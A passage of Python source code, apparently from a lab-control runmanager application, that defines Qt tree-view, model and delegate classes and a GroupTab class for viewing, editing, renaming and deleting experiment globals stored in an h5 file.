self._double_click = False
return result
def event(self, event):
if (event.type() == QtCore.QEvent.ShortcutOverride
and event.key() in [QtCore.Qt.Key_Enter, QtCore.Qt.Key_Return]):
event.accept()
item = self.model().itemFromIndex(self.currentIndex())
if item is not None and item.isEditable():
if self.state() != QtWidgets.QTreeView.EditingState:
self.edit(self.currentIndex())
else:
# Enter on non-editable items simulates a left click:
self.leftClicked.emit(self.currentIndex())
return True
else:
return QtWidgets.QTreeView.event(self, event)
def keyPressEvent(self, event):
if event.key() == QtCore.Qt.Key_Space:
item = self.model().itemFromIndex(self.currentIndex())
if not item.isEditable():
# Space on non-editable items simulates a left click:
self.leftClicked.emit(self.currentIndex())
return QtWidgets.QTreeView.keyPressEvent(self, event)
def moveCursor(self, cursor_action, keyboard_modifiers):
current_index = self.currentIndex()
current_row, current_column = current_index.row(), current_index.column()
if cursor_action == QtWidgets.QTreeView.MoveUp:
return current_index.sibling(current_row - 1, current_column)
elif cursor_action == QtWidgets.QTreeView.MoveDown:
return current_index.sibling(current_row + 1, current_column)
elif cursor_action == QtWidgets.QTreeView.MoveLeft:
return current_index.sibling(current_row, current_column - 1)
elif cursor_action == QtWidgets.QTreeView.MoveRight:
return current_index.sibling(current_row, current_column + 1)
elif cursor_action == QtWidgets.QTreeView.MovePrevious:
return current_index.sibling(current_row, current_column - 1)
elif cursor_action == QtWidgets.QTreeView.MoveNext:
item = self.model().itemFromIndex(self.currentIndex())
if (item is not None and self._ROLE_IGNORE_TABNEXT is not None
and item.data(self._ROLE_IGNORE_TABNEXT)):
# A null index means end editing and don't go anywhere:
return QtCore.QModelIndex()
return current_index.sibling(current_row, current_column + 1)
else:
return QtWidgets.QTreeView.moveCursor(self, cursor_action, keyboard_modifiers)
class AlternatingColorModel(QtGui.QStandardItemModel):
def __init__(self, treeview):
QtGui.QStandardItemModel.__init__(self)
# How much darker in each channel is the alternate base color compared
# to the base color?
palette = treeview.palette()
normal_color = palette.color(QtGui.QPalette.Base)
alternate_color = palette.color(QtGui.QPalette.AlternateBase)
r, g, b, a = normal_color.getRgb()
alt_r, alt_g, alt_b, alt_a = alternate_color.getRgb()
self.delta_r = alt_r - r
self.delta_g = alt_g - g
self.delta_b = alt_b - b
self.delta_a = alt_a - a
# A cache, store brushes so we don't have to recalculate them. Is faster.
self.alternate_brushes = {}
def data(self, index, role):
"""When background color data is being requested, returns modified
colours for every second row, according to the palette of the treeview.
This has the effect of making the alternate colours visible even when
custom colors have been set - the same shading will be applied to the
custom colours. Only really looks sensible when the normal and
alternate colors are similar."""
if role == QtCore.Qt.BackgroundRole and index.row() % 2:
normal_brush = QtGui.QStandardItemModel.data(self, index, QtCore.Qt.BackgroundRole)
if normal_brush is not None:
normal_color = normal_brush.color()
try:
return self.alternate_brushes[normal_color.rgb()]
except KeyError:
r, g, b, a = normal_color.getRgb()
alt_r = min(max(r + self.delta_r, 0), 255)
alt_g = min(max(g + self.delta_g, 0), 255)
alt_b = min(max(b + self.delta_b, 0), 255)
alt_a = min(max(a + self.delta_a, 0), 255)
alternate_color = QtGui.QColor(alt_r, alt_g, alt_b, alt_a)
alternate_brush = QtGui.QBrush(alternate_color)
self.alternate_brushes[normal_color.rgb()] = alternate_brush
return alternate_brush
return QtGui.QStandardItemModel.data(self, index, role)
class ItemDelegate(QtWidgets.QStyledItemDelegate):
"""An item delegate with a fixed height and faint grey vertical lines
between columns"""
EXTRA_ROW_HEIGHT = 7
def __init__(self, treeview, *args, **kwargs):
QtWidgets.QStyledItemDelegate.__init__(self, *args, **kwargs)
self._pen = QtGui.QPen()
self._pen.setWidth(1)
self._pen.setColor(QtGui.QColor.fromRgb(128, 128, 128, 64))
fontmetrics = QtGui.QFontMetrics(treeview.font())
text_height = fontmetrics.height()
self.height = text_height + self.EXTRA_ROW_HEIGHT
def sizeHint(self, *args):
size = QtWidgets.QStyledItemDelegate.sizeHint(self, *args)
return QtCore.QSize(size.width(), self.height)
def paint(self, painter, option, index):
QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)
if index.column() > 0:
painter.setPen(self._pen)
painter.drawLine(option.rect.topLeft(), option.rect.bottomLeft())
class GroupTab(object):
GLOBALS_COL_DELETE = 0
GLOBALS_COL_NAME = 1
GLOBALS_COL_VALUE = 2
GLOBALS_COL_UNITS = 3
GLOBALS_COL_EXPANSION = 4
GLOBALS_ROLE_IS_DUMMY_ROW = QtCore.Qt.UserRole + 1
GLOBALS_ROLE_SORT_DATA = QtCore.Qt.UserRole + 2
GLOBALS_ROLE_PREVIOUS_TEXT = QtCore.Qt.UserRole + 3
GLOBALS_ROLE_IS_BOOL = QtCore.Qt.UserRole + 4
GLOBALS_ROLE_IGNORE_TABNEXT = QtCore.Qt.UserRole + 5
COLOR_ERROR = '#FF9999' # light red
COLOR_OK = '#AAFFCC' # light green
COLOR_BOOL_ON = '#66FF33' # bright green
COLOR_BOOL_OFF = '#608060' # dark green
COLOR_NAME = '#EFEFEF' # light grey
GLOBALS_DUMMY_ROW_TEXT = '<Click to add global>'
def __init__(self, tabWidget, globals_file, group_name):
self.tabWidget = tabWidget
loader = UiLoader()
loader.registerCustomWidget(TreeView)
self.ui = loader.load('group.ui')
# Add the ui to the parent tabWidget:
self.tabWidget.addTab(self.ui, group_name, closable=True)
self.set_file_and_group_name(globals_file, group_name)
self.globals_model = AlternatingColorModel(treeview=self.ui.treeView_globals)
self.globals_model.setHorizontalHeaderLabels(['Delete', 'Name', 'Value', 'Units', 'Expansion'])
self.globals_model.setSortRole(self.GLOBALS_ROLE_SORT_DATA)
self.item_delegate = ItemDelegate(self.ui.treeView_globals)
for col in range(self.globals_model.columnCount()):
self.ui.treeView_globals.setItemDelegateForColumn(col, self.item_delegate)
self.ui.treeView_globals.setModel(self.globals_model)
self.ui.treeView_globals.setRoleIgnoreTabNext(self.GLOBALS_ROLE_IGNORE_TABNEXT)
self.ui.treeView_globals.setSelectionMode(QtWidgets.QTreeView.ExtendedSelection)
self.ui.treeView_globals.setSortingEnabled(True)
# Make it so the user can just start typing on an item to edit:
self.ui.treeView_globals.setEditTriggers(QtWidgets.QTreeView.AnyKeyPressed |
QtWidgets.QTreeView.EditKeyPressed)
# Ensure the clickable region of the delete button doesn't extend forever:
self.ui.treeView_globals.header().setStretchLastSection(False)
# Setup stuff for a custom context menu:
self.ui.treeView_globals.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
# Make the actions for the context menu:
self.action_globals_delete_selected = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/minus'), 'Delete selected global(s)', self.ui)
self.action_globals_set_selected_true = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box'), 'Set selected Booleans True', self.ui)
self.action_globals_set_selected_false = QtWidgets.QAction(
QtGui.QIcon(':qtutils/fugue/ui-check-box-uncheck'), 'Set selected Booleans False', self.ui)
self.connect_signals()
# Populate the model with globals from the h5 file:
self.populate_model()
# Set sensible column widths:
for col in range(self.globals_model.columnCount()):
self.ui.treeView_globals.resizeColumnToContents(col)
if self.ui.treeView_globals.columnWidth(self.GLOBALS_COL_NAME) < 200:
self.ui.treeView_globals.setColumnWidth(self.GLOBALS_COL_NAME, 200)
if self.ui.treeView_globals.columnWidth(self.GLOBALS_COL_VALUE) < 200:
self.ui.treeView_globals.setColumnWidth(self.GLOBALS_COL_VALUE, 200)
if self.ui.treeView_globals.columnWidth(self.GLOBALS_COL_UNITS) < 100:
self.ui.treeView_globals.setColumnWidth(self.GLOBALS_COL_UNITS, 100)
if self.ui.treeView_globals.columnWidth(self.GLOBALS_COL_EXPANSION) < 100:
self.ui.treeView_globals.setColumnWidth(self.GLOBALS_COL_EXPANSION, 100)
self.ui.treeView_globals.resizeColumnToContents(self.GLOBALS_COL_DELETE)
def connect_signals(self):
self.ui.treeView_globals.leftClicked.connect(self.on_treeView_globals_leftClicked)
self.ui.treeView_globals.customContextMenuRequested.connect(self.on_treeView_globals_context_menu_requested)
self.action_globals_set_selected_true.triggered.connect(
lambda: self.on_globals_set_selected_bools_triggered('True'))
self.action_globals_set_selected_false.triggered.connect(
lambda: self.on_globals_set_selected_bools_triggered('False'))
self.action_globals_delete_selected.triggered.connect(self.on_globals_delete_selected_triggered)
self.globals_model.itemChanged.connect(self.on_globals_model_item_changed)
# A context manager with which we can temporarily disconnect the above connection.
self.globals_model_item_changed_disconnected = DisconnectContextManager(
self.globals_model.itemChanged, self.on_globals_model_item_changed)
def set_file_and_group_name(self, globals_file, group_name):
"""Provided as a separate method so the main app can call it if the
group gets renamed"""
self.globals_file = globals_file
self.group_name = group_name
self.ui.label_globals_file.setText(globals_file)
self.ui.label_group_name.setText(group_name)
index = self.tabWidget.indexOf(self.ui)
self.tabWidget.setTabText(index, group_name)
self.tabWidget.setTabToolTip(index, '%s\n(%s)' % (group_name, globals_file))
def set_tab_icon(self, icon_string):
index = self.tabWidget.indexOf(self.ui)
if icon_string is not None:
icon = QtGui.QIcon(icon_string)
else:
icon = QtGui.QIcon()
if self.tabWidget.tabIcon(index).cacheKey() != icon.cacheKey():
logger.info('setting tab icon')
self.tabWidget.setTabIcon(index, icon)
def populate_model(self):
globals = runmanager.get_globals({self.group_name: self.globals_file})[self.group_name]
for name, (value, units, expansion) in globals.items():
row = self.make_global_row(name, value, units, expansion)
self.globals_model.appendRow(row)
value_item = row[self.GLOBALS_COL_VALUE]
self.check_for_boolean_values(value_item)
expansion_item = row[self.GLOBALS_COL_EXPANSION]
self.on_globals_model_expansion_changed(expansion_item)
# Add the dummy item at the end:
dummy_delete_item = QtGui.QStandardItem()
# This lets later code know that this row does not correspond to an
# actual global:
dummy_delete_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_delete_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_delete_item.setToolTip('Click to add global')
dummy_name_item = QtGui.QStandardItem(self.GLOBALS_DUMMY_ROW_TEXT)
dummy_name_item.setToolTip('Click to add global')
dummy_name_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_name_item.setData(self.GLOBALS_DUMMY_ROW_TEXT, self.GLOBALS_ROLE_PREVIOUS_TEXT)
dummy_name_item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsEditable) # Clears the 'selectable' flag
dummy_name_item.setBackground(QtGui.QColor(self.COLOR_NAME))
dummy_value_item = QtGui.QStandardItem()
dummy_value_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_value_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_value_item.setToolTip('Click to add global')
dummy_units_item = QtGui.QStandardItem()
dummy_units_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_units_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_units_item.setToolTip('Click to add global')
dummy_expansion_item = QtGui.QStandardItem()
dummy_expansion_item.setData(True, self.GLOBALS_ROLE_IS_DUMMY_ROW)
dummy_expansion_item.setFlags(QtCore.Qt.NoItemFlags)
dummy_expansion_item.setToolTip('Click to add global')
self.globals_model.appendRow(
[dummy_delete_item, dummy_name_item, dummy_value_item, dummy_units_item, dummy_expansion_item])
# Sort by name:
self.ui.treeView_globals.sortByColumn(self.GLOBALS_COL_NAME, QtCore.Qt.AscendingOrder)
def make_global_row(self, name, value='', units='', expansion=''):
logger.debug('%s:%s - make global row: %s ' % (self.globals_file, self.group_name, name))
# We just set some data here, other stuff is set in
# self.update_parse_indication after runmanager has a chance to parse
# everything and get back to us about what that data should be.
delete_item = QtGui.QStandardItem()
delete_item.setIcon(QtGui.QIcon(':qtutils/fugue/minus'))
# Must be set to something so that the dummy row doesn't get sorted first:
delete_item.setData(False, self.GLOBALS_ROLE_SORT_DATA)
delete_item.setEditable(False)
delete_item.setToolTip('Delete global from group.')
name_item = QtGui.QStandardItem(name)
name_item.setData(name, self.GLOBALS_ROLE_SORT_DATA)
name_item.setData(name, self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_item.setToolTip(name)
name_item.setBackground(QtGui.QColor(self.COLOR_NAME))
value_item = QtGui.QStandardItem(value)
value_item.setData(value, self.GLOBALS_ROLE_SORT_DATA)
value_item.setData(str(value), self.GLOBALS_ROLE_PREVIOUS_TEXT)
value_item.setToolTip('Evaluating...')
units_item = QtGui.QStandardItem(units)
units_item.setData(units, self.GLOBALS_ROLE_SORT_DATA)
units_item.setData(units, self.GLOBALS_ROLE_PREVIOUS_TEXT)
units_item.setData(False, self.GLOBALS_ROLE_IS_BOOL)
# Treeview.moveCursor will see this and not go to the expansion item
# when tab is pressed after editing:
units_item.setData(True, self.GLOBALS_ROLE_IGNORE_TABNEXT)
units_item.setToolTip('')
expansion_item = QtGui.QStandardItem(expansion)
expansion_item.setData(expansion, self.GLOBALS_ROLE_SORT_DATA)
expansion_item.setData(expansion, self.GLOBALS_ROLE_PREVIOUS_TEXT)
expansion_item.setToolTip('')
row = [delete_item, name_item, value_item, units_item, expansion_item]
return row
def on_treeView_globals_leftClicked(self, index):
if qapplication.keyboardModifiers() != QtCore.Qt.NoModifier:
# Only handle mouseclicks with no keyboard modifiers.
return
item = self.globals_model.itemFromIndex(index)
# The 'name' item in the same row:
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
if item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
# They clicked on an 'add new global' row. Enter editing mode on
# the name item so they can enter a name for the new global:
self.ui.treeView_globals.setCurrentIndex(name_index)
self.ui.treeView_globals.edit(name_index)
elif item.data(self.GLOBALS_ROLE_IS_BOOL):
# It's a bool indicator. Toggle it
value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
if value_item.text() == 'True':
value_item.setText('False')
elif value_item.text() == 'False':
value_item.setText('True')
else:
raise AssertionError('expected boolean value')
elif item.column() == self.GLOBALS_COL_DELETE:
# They clicked a delete button.
self.delete_global(global_name)
elif not item.data(self.GLOBALS_ROLE_IS_BOOL):
# Edit whatever it is:
if (self.ui.treeView_globals.currentIndex() != index
or self.ui.treeView_globals.state() != QtWidgets.QTreeView.EditingState):
self.ui.treeView_globals.setCurrentIndex(index)
self.ui.treeView_globals.edit(index)
def on_globals_model_item_changed(self, item):
if item.column() == self.GLOBALS_COL_NAME:
self.on_globals_model_name_changed(item)
elif item.column() == self.GLOBALS_COL_VALUE:
self.on_globals_model_value_changed(item)
elif item.column() == self.GLOBALS_COL_UNITS:
self.on_globals_model_units_changed(item)
elif item.column() == self.GLOBALS_COL_EXPANSION:
self.on_globals_model_expansion_changed(item)
def on_globals_model_name_changed(self, item):
"""Handles global renaming and creation of new globals due to the user
editing the <click to add global> item"""
item_text = item.text()
if item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
if item_text != self.GLOBALS_DUMMY_ROW_TEXT:
# The user has made a new global by editing the <click to add
# global> item
global_name = item_text
self.new_global(global_name)
else:
# User has renamed a global.
new_global_name = item_text
previous_global_name = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
# Ensure the name actually changed, rather than something else
# about the item:
if new_global_name != previous_global_name:
self.rename_global(previous_global_name, new_global_name)
def on_globals_model_value_changed(self, item):
index = item.index()
new_value = item.text()
previous_value = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
# Ensure the value actually changed, rather than something else about
# the item:
if new_value != previous_value:
self.change_global_value(global_name, previous_value, new_value)
def on_globals_model_units_changed(self, item):
index = item.index()
new_units = item.text()
previous_units = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
# If it's a boolean value, ensure the check state matches the bool state:
if item.data(self.GLOBALS_ROLE_IS_BOOL):
value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
if value_item.text() == 'True':
item.setCheckState(QtCore.Qt.Checked)
elif value_item.text() == 'False':
item.setCheckState(QtCore.Qt.Unchecked)
else:
raise AssertionError('expected boolean value')
# Ensure the value actually changed, rather than something else about
# the item:
if new_units != previous_units:
self.change_global_units(global_name, previous_units, new_units)
def on_globals_model_expansion_changed(self, item):
index = item.index()
new_expansion = item.text()
previous_expansion = item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT)
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
name_item = self.globals_model.itemFromIndex(name_index)
global_name = name_item.text()
# Don't want icon changing to recurse - which happens even if it is
# the same icon. So disconnect the signal temporarily:
with self.globals_model_item_changed_disconnected:
if new_expansion == 'outer':
item.setIcon(QtGui.QIcon(':qtutils/custom/outer'))
item.setToolTip('This global will be interpreted as a list of values, and will ' +
'be outer producted with other lists to form a larger parameter space.')
elif new_expansion:
item.setIcon(QtGui.QIcon(':qtutils/custom/zip'))
item.setToolTip('This global will be interpreted as a list of values, and will ' +
'be iterated over in lock-step with other globals in the ' +
'\'%s\' zip group.' % new_expansion)
else:
item.setData(None, QtCore.Qt.DecorationRole)
item.setToolTip('This global will be interpreted as a single value and passed to compilation as-is.')
# Ensure the value actually changed, rather than something else about
# the item:
if new_expansion != previous_expansion:
self.change_global_expansion(global_name, previous_expansion, new_expansion)
def on_treeView_globals_context_menu_requested(self, point):
menu = QtWidgets.QMenu(self.ui)
menu.addAction(self.action_globals_set_selected_true)
menu.addAction(self.action_globals_set_selected_false)
menu.addAction(self.action_globals_delete_selected)
menu.exec_(QtGui.QCursor.pos())
def on_globals_delete_selected_triggered(self):
selected_indexes = self.ui.treeView_globals.selectedIndexes()
selected_items = (self.globals_model.itemFromIndex(index) for index in selected_indexes)
name_items = [item for item in selected_items if item.column() == self.GLOBALS_COL_NAME]
# If multiple selected, show 'delete n groups?' message. Otherwise,
# pass confirm=True to self.delete_global so it can show the regular
# message.
confirm_multiple = (len(name_items) > 1)
if confirm_multiple:
if not question_dialog("Delete %d globals?" % len(name_items)):
return
for item in name_items:
global_name = item.text()
self.delete_global(global_name, confirm=not confirm_multiple)
def on_globals_set_selected_bools_triggered(self, state):
selected_indexes = self.ui.treeView_globals.selectedIndexes()
selected_items = [self.globals_model.itemFromIndex(index) for index in selected_indexes]
value_items = [item for item in selected_items if item.column() == self.GLOBALS_COL_VALUE]
units_items = [item for item in selected_items if item.column() == self.GLOBALS_COL_UNITS]
for value_item, units_item in zip(value_items, units_items):
if units_item.data(self.GLOBALS_ROLE_IS_BOOL):
value_item.setText(state)
def close(self):
# It is up to the main runmanager class to drop references to this
# instance before or after calling this method, so that after the
# tabWidget no longer owns our widgets, both the widgets and the
# instance will be garbage collected.
index = self.tabWidget.indexOf(self.ui)
self.tabWidget.removeTab(index)
def get_global_item_by_name(self, global_name, column, previous_name=None):
"""Returns an item from the row representing a global in the globals model.
Which item is returned is set by the column argument."""
possible_name_items = self.globals_model.findItems(global_name, column=self.GLOBALS_COL_NAME)
if previous_name is not None:
# Filter by previous name, useful for telling rows apart when a
# rename is in progress and two rows may temporarily contain the
# same name (though the rename code with throw an error and revert
# it).
possible_name_items = [item for item in possible_name_items
if item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT) == previous_name]
elif global_name != self.GLOBALS_DUMMY_ROW_TEXT:
# Don't return the dummy item unless they asked for it explicitly
# - if a new global is being created, its name might be
# simultaneously present in its own row and the dummy row too.
possible_name_items = [item for item in possible_name_items
if not item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW)]
if len(possible_name_items) > 1:
raise LookupError('Multiple items found')
elif not possible_name_items:
raise LookupError('No item found')
name_item = possible_name_items[0]
name_index = name_item.index()
# Found the name item, get the sibling item for the column requested:
item_index = name_index.sibling(name_index.row(), column)
item = self.globals_model.itemFromIndex(item_index)
return item
def do_model_sort(self):
header = self.ui.treeView_globals.header()
sort_column = header.sortIndicatorSection()
sort_order = header.sortIndicatorOrder()
self.ui.treeView_globals.sortByColumn(sort_column, sort_order)
def new_global(self, global_name):
logger.info('%s:%s - new global: %s', self.globals_file, self.group_name, global_name)
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_NAME,
previous_name=self.GLOBALS_DUMMY_ROW_TEXT)
try:
runmanager.new_global(self.globals_file, self.group_name, global_name)
except Exception as e:
error_dialog(str(e))
else:
# Insert the newly created global into the model:
global_row = self.make_global_row(global_name)
last_index = self.globals_model.rowCount()
# Insert it as the row before the last (dummy) row:
self.globals_model.insertRow(last_index - 1, global_row)
self.do_model_sort()
# Go into edit mode on the 'value' item:
value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE,
previous_name=global_name)
value_item_index = value_item.index()
self.ui.treeView_globals.setCurrentIndex(value_item_index)
self.ui.treeView_globals.edit(value_item_index)
self.globals_changed()
finally:
# Set the dummy row's text back ready for another group to be created:
item.setText(self.GLOBALS_DUMMY_ROW_TEXT)
def rename_global(self, previous_global_name, new_global_name):
logger.info('%s:%s - rename global: %s -> %s',
self.globals_file, self.group_name, previous_global_name, new_global_name)
item = self.get_global_item_by_name(new_global_name, self.GLOBALS_COL_NAME,
previous_name=previous_global_name)
try:
runmanager.rename_global(self.globals_file, self.group_name, previous_global_name, new_global_name)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old name, since the rename failed:
item.setText(previous_global_name)
else:
item.setData(new_global_name, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_global_name, self.GLOBALS_ROLE_SORT_DATA)
self.do_model_sort()
item.setToolTip(new_global_name)
self.globals_changed()
value_item = self.get_global_item_by_name(new_global_name, self.GLOBALS_COL_VALUE)
value = value_item.text()
if not value:
# Go into editing the units item automatically:
value_item_index = value_item.index()
self.ui.treeView_globals.setCurrentIndex(value_item_index)
self.ui.treeView_globals.edit(value_item_index)
else:
# If this changed the sort order, ensure the item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_globals, item)
def change_global_value(self, global_name, previous_value, new_value):
logger.info('%s:%s - change global value: %s = %s -> %s' %
(self.globals_file, self.group_name, global_name, previous_value, new_value))
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
previous_background = item.background()
previous_icon = item.icon()
item.setData(new_value, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_value, self.GLOBALS_ROLE_SORT_DATA)
item.setData(None, QtCore.Qt.BackgroundRole)
item.setIcon(QtGui.QIcon(':qtutils/fugue/hourglass'))
args = global_name, previous_value, new_value, item, previous_background, previous_icon
QtCore.QTimer.singleShot(1, lambda: self.complete_change_global_value(*args))
def complete_change_global_value(self, global_name, previous_value, new_value, item, previous_background, previous_icon):
try:
runmanager.set_value(self.globals_file, self.group_name, global_name, new_value)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old name, since the change failed:
with self.globals_model_item_changed_disconnected:
item.setText(previous_value)
item.setData(previous_value, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(previous_value, self.GLOBALS_ROLE_SORT_DATA)
item.setData(previous_background, QtCore.Qt.BackgroundRole)
item.setIcon(previous_icon)
else:
self.check_for_boolean_values(item)
self.do_model_sort()
item.setToolTip('Evaluating...')
self.globals_changed()
units_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_UNITS)
units = units_item.text()
if not units:
# Go into editing the units item automatically:
units_item_index = units_item.index()
self.ui.treeView_globals.setCurrentIndex(units_item_index)
self.ui.treeView_globals.edit(units_item_index)
else:
# If this changed the sort order, ensure the item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_globals, item)
def change_global_units(self, global_name, previous_units, new_units):
logger.info('%s:%s - change units: %s = %s -> %s' %
(self.globals_file, self.group_name, global_name, previous_units, new_units))
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_UNITS)
try:
runmanager.set_units(self.globals_file, self.group_name, global_name, new_units)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old units, since the change failed:
item.setText(previous_units)
else:
item.setData(new_units, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_units, self.GLOBALS_ROLE_SORT_DATA)
self.do_model_sort()
# If this changed the sort order, ensure the item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_globals, item)
def change_global_expansion(self, global_name, previous_expansion, new_expansion):
logger.info('%s:%s - change expansion: %s = %s -> %s' %
(self.globals_file, self.group_name, global_name, previous_expansion, new_expansion))
item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_EXPANSION)
try:
runmanager.set_expansion(self.globals_file, self.group_name, global_name, new_expansion)
except Exception as e:
error_dialog(str(e))
# Set the item text back to the old units, since the change failed:
item.setText(previous_expansion)
else:
item.setData(new_expansion, self.GLOBALS_ROLE_PREVIOUS_TEXT)
item.setData(new_expansion, self.GLOBALS_ROLE_SORT_DATA)
self.do_model_sort()
self.globals_changed()
# If this changed the sort order, ensure the item is still visible:
scroll_treeview_to_row_if_current(self.ui.treeView_globals, item)
def check_for_boolean_values(self, item):
"""Checks if the value is 'True' or 'False'. If either, makes the
units cell checkable, uneditable, and coloured to indicate the state.
The units cell can then be clicked to toggle the value."""
index = item.index()
value = item.text()
name_index = index.sibling(index.row(), self.GLOBALS_COL_NAME)
units_index = index.sibling(index.row(), self.GLOBALS_COL_UNITS)
name_item = self.globals_model.itemFromIndex(name_index)
units_item = self.globals_model.itemFromIndex(units_index)
global_name = name_item.text()
logger.debug('%s:%s - check for boolean values: %s' %
(self.globals_file, self.group_name, global_name))
if value == 'True':
units_item.setData(True, self.GLOBALS_ROLE_IS_BOOL)
units_item.setText('Bool')
units_item.setData('!1', self.GLOBALS_ROLE_SORT_DATA)
units_item.setEditable(False)
units_item.setCheckState(QtCore.Qt.Checked)
units_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_BOOL_ON)))
elif value == 'False':
units_item.setData(True, self.GLOBALS_ROLE_IS_BOOL)
units_item.setText('Bool')
units_item.setData('!0', self.GLOBALS_ROLE_SORT_DATA)
units_item.setEditable(False)
units_item.setCheckState(QtCore.Qt.Unchecked)
units_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_BOOL_OFF)))
else:
was_bool = units_item.data(self.GLOBALS_ROLE_IS_BOOL)
units_item.setData(False, self.GLOBALS_ROLE_IS_BOOL)
units_item.setEditable(True)
# Checkbox still visible unless we do the following:
units_item.setData(None, QtCore.Qt.CheckStateRole)
units_item.setData(None, QtCore.Qt.BackgroundRole)
if was_bool:
# If the item was a bool and now isn't, clear the
# units and go into editing so the user can enter a
# new units string:
units_item.setText('')
self.ui.treeView_globals.setCurrentIndex(units_item.index())
self.ui.treeView_globals.edit(units_item.index())
def globals_changed(self):
"""Called whenever something about a global has changed. call
app.globals_changed to inform the main application that it needs to
parse globals again. self.update_parse_indication will be called by
the main app when parsing is done, and will set the colours and
tooltips appropriately"""
# Tell the main app about it:
app.globals_changed()
def delete_global(self, global_name, confirm=True):
logger.info('%s:%s - delete global: %s' %
(self.globals_file, self.group_name, global_name))
if confirm:
if not question_dialog("Delete the global '%s'?" % global_name):
return
runmanager.delete_global(self.globals_file, self.group_name, global_name)
# Find the entry for this global in self.globals_model and remove it:
name_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_NAME)
self.globals_model.removeRow(name_item.row())
self.globals_changed()
def update_parse_indication(self, active_groups, sequence_globals, evaled_globals):
# Check that we are an active group:
if self.group_name in active_groups and active_groups[self.group_name] == self.globals_file:
tab_contains_errors = False
# for global_name, value in evaled_globals[self.group_name].items():
for i in range(self.globals_model.rowCount()):
name_item = self.globals_model.item(i, self.GLOBALS_COL_NAME)
if name_item.data(self.GLOBALS_ROLE_IS_DUMMY_ROW):
continue
value_item = self.globals_model.item(i, self.GLOBALS_COL_VALUE)
expansion_item = self.globals_model.item(i, self.GLOBALS_COL_EXPANSION)
# value_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_VALUE)
# expansion_item = self.get_global_item_by_name(global_name, self.GLOBALS_COL_EXPANSION)
global_name = name_item.text()
value = evaled_globals[self.group_name][global_name]
ignore, ignore, expansion = sequence_globals[self.group_name][global_name]
# Temporarily disconnect the item_changed signal on the model
# so that we can set the expansion type without triggering
# another preparse - the parsing has already been done with
# the new expansion type.
with self.globals_model_item_changed_disconnected:
if expansion_item.data(self.GLOBALS_ROLE_PREVIOUS_TEXT) != expansion:
# logger.info('expansion previous text set')
expansion_item.setData(expansion, self.GLOBALS_ROLE_PREVIOUS_TEXT)
if expansion_item.data(self.GLOBALS_ROLE_SORT_DATA) != expansion:
# logger.info('sort data role set')
expansion_item.setData(expansion, self.GLOBALS_ROLE_SORT_DATA)
# The next line will now trigger item_changed, but it will not
# be detected as an actual change to the expansion type,
# because previous_text will match text. So it will not look
# like a change and will not trigger preparsing. However It is
# still important that other triggers be processed, such as
# setting the icon in the expansion item, so that will still
# occur in the callback.
expansion_item.setText(expansion)
if isinstance(value, Exception):
value_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_ERROR)))
value_item.setIcon(QtGui.QIcon(':qtutils/fugue/exclamation'))
tooltip = '%s: %s' % (value.__class__.__name__, value.message)
tab_contains_errors = True
else:
if value_item.background().color().name().lower() != self.COLOR_OK.lower():
value_item.setBackground(QtGui.QBrush(QtGui.QColor(self.COLOR_OK)))
if not value_item.icon().isNull():
# logger.info('clearing icon')
value_item.setData(None, QtCore.Qt.DecorationRole)
tooltip = repr(value)
if value_item.toolTip() != tooltip:
# logger.info('tooltip_changed')
value_item.setToolTip(tooltip)
if tab_contains_errors:
self.set_tab_icon(':qtutils/fugue/exclamation')
else:
self.set_tab_icon(None)
else:
# Clear everything:
self.set_tab_icon(None)
for row in range(self.globals_model.rowCount()):
